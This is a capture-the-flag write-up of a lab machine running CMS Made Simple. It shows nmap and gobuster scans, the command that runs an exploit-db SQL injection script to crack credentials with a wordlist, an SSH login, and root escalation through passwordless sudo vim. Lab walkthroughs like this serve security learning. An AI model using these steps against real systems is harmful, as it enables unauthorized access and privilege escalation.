The first step of my enumeration was a scan with nmap. by the command:
nmap 10.10.198.35 -sC
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-22 13:14 EDT Nmap scan report for 10.10.198.35 Host is up (0.11s latency). Not shown: 997 filtered ports PORT STATE SERVICE 21/tcp open ftp | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.8.174.180 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 80/tcp open http | http-robots.txt: 2 disallowed entries |_/ /openemr-5_0_1_3 |_http-title: Apache2 Ubuntu Default Page: It works 2222/tcp open EtherNetIP-1 | ssh-hostkey: | 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA) | 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA) |_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519) Nmap done: 1 IP address (1 host up) scanned in 40.71 seconds
The “Nmap Output” displayed
2 services running under port 1000 and ssh service running on the higher port.
I next decided to run a gobuster scan on the webserver to see if there were any interesting hidden directories, by the command:
gobuster dir -u http://10.10.198.35 -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -x html,xml,php
Browsing to http://10.10.198.35/simple gives us the version of CMS Made Simple:
I then searched for the cve on exploit-db and found the cve with the exploit:
Then I run the exploit using python (version 2.7) inside a virtual environment:
python cms_pa.py -u http://10.10.198.35/simple/ -c -w rockyou.txt
And now I tried to access SSH with the credentials that We found:
ssh -p 2222 email@example.com
Let's check the current dir for a flag:
So now I tried the infamous
sudo -l comand to privilege escalate the system
And i found that mitch can run vim with root privileges with NOPASSWD
User mitch may run the following commands on Machine: (root) NOPASSWD: /usr/bin/vim
So I checked GTFObins so that I spawn a bash shell as root.
And now we're root, Let's check the root dir for a flag:
Thanks for reading!!!